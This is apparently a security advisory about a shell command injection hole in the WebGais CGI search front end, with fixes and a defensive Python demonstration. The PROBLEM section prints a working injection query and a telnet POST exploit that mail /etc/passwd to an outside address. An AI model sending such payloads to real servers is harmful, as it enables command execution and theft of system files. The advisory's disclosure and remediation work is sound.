COMMAND

    webgais

SYSTEMS AFFECTED

    Systems running this tool

PROBLEM

    WebGais is a web front end to the GAIS search tool. It installs a few
    programs in /cgi-bin. The main one is called "webgais" and does the
    actual interfacing with the search engine.

    It reads the query from a user form and then runs the GAIS search
    engine for that query. The author tried to protect the program by
    wrapping the query in single quotes before passing it to a "system"
    call. But one VERY important step is missing: stripping single quotes
    from the query itself (this was done in Glimpse). A single quote
    inside the query therefore closes the quoted string, and whatever
    follows is parsed and executed by the shell. So, if we send a query
    like:

        query=';mail+foo@somewhere.net</etc/passwd;echo'&.....

    the "protection" is bypassed and the injected commands run with the
    privileges of the web server.

    The only difficulty is that a particular combination of input
    parameters is needed to reach the vulnerable line in the script.
    Credit goes to Razvan Dragomirescu. Here is how he exploited it:

        telnet target.machine.com 80
        POST /cgi-bin/webgais HTTP/1.0
        Content-length: 85 (replace this with the actual length of the "exploit" line)

        query=';mail+you\@your.host</etc/passwd;echo'&output=subject&domain=paragraph

    ... and it worked. To make it work against another installation you
    will have to add the other parameters the script requires in its
    original version, such as idx_dir and data_type. Make a normal query
    to your WebGais server and note all the parameters it sends. But keep
    "output" and "domain" exactly as in this exploit; otherwise you will
    end up in a different branch of the script and nothing will happen.

SOLUTION

    Stripping single quotes from the query (as Glimpse does) closes this
    particular hole. A more robust fix is not to pass user input through
    a shell at all: execute the search binary directly with the query as
    a separate argument, so no character in it can be interpreted as
    shell syntax. If the command really must be assembled as a string,
    escape embedded single quotes properly instead of relying on a strip
    step that silently alters the user's query.
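    The quoting mistake described under PROBLEM and the fixes discussed
    under SOLUTION, side by side, as an added example that is not part of
    the original advisory or of the WebGais code. It uses printf as a
    constructed stand-in for the gais binary (so the output shows exactly
    which text reached the program and which text the shell ran), and the
    advisory's mail payload is replaced by a harmless "echo INJECTED";
    the function names are the example's own.

```python
import shlex
import subprocess

# Constructed stand-in for the GAIS binary invoked by webgais: printf just
# echoes its argument back, so the output makes visible which text reached
# the search program as an argument and which text the shell executed.
STAND_IN = "printf 'query=%s\\n'"

# The advisory's query shape, with "mail ... </etc/passwd" replaced by a
# harmless "echo INJECTED" so the demonstration is safe to run anywhere.
EVIL_QUERY = "';echo INJECTED;echo'"


def vulnerable_command(query):
    """Builds the command string the way webgais did: the raw query wrapped
    in single quotes. A single quote inside `query` ends the quoted region
    and everything after it is parsed as shell syntax."""
    return "%s '%s'" % (STAND_IN, query)


def run_vulnerable(query):
    """system()-style execution of the string above through /bin/sh."""
    out = subprocess.run(vulnerable_command(query), shell=True,
                         capture_output=True, text=True)
    return out.stdout


def run_stripped(query):
    """The advisory's fix (what Glimpse did): drop single quotes before
    quoting. The attacker can no longer break out of the quotes, but the
    query text is silently altered in the process."""
    return run_vulnerable(query.replace("'", ""))


def run_quoted(query):
    """If a shell string must be built, escape rather than strip:
    shlex.quote turns each embedded ' into '"'"' so the argument reaches
    the program intact and nothing in it is parsed as shell syntax."""
    out = subprocess.run("%s %s" % (STAND_IN, shlex.quote(query)),
                         shell=True, capture_output=True, text=True)
    return out.stdout


def run_hardened(query):
    """Preferred fix: no shell at all. The query is one argv element, so
    no character in it can ever be interpreted as shell syntax."""
    out = subprocess.run(["printf", "query=%s\n", query],
                         capture_output=True, text=True)
    return out.stdout


if __name__ == "__main__":
    print("vulnerable:", repr(run_vulnerable(EVIL_QUERY)))
    print("stripped:  ", repr(run_stripped(EVIL_QUERY)))
    print("quoted:    ", repr(run_quoted(EVIL_QUERY)))
    print("hardened:  ", repr(run_hardened(EVIL_QUERY)))
```

    Run it and compare the four outputs: only the vulnerable version prints
    "INJECTED" on a line of its own, i.e. the shell ran the injected echo
    as a separate command; the stripped version keeps the attacker out but
    hands the search program a mangled query, while the escaped and the
    argv-based versions both deliver the query byte-for-byte.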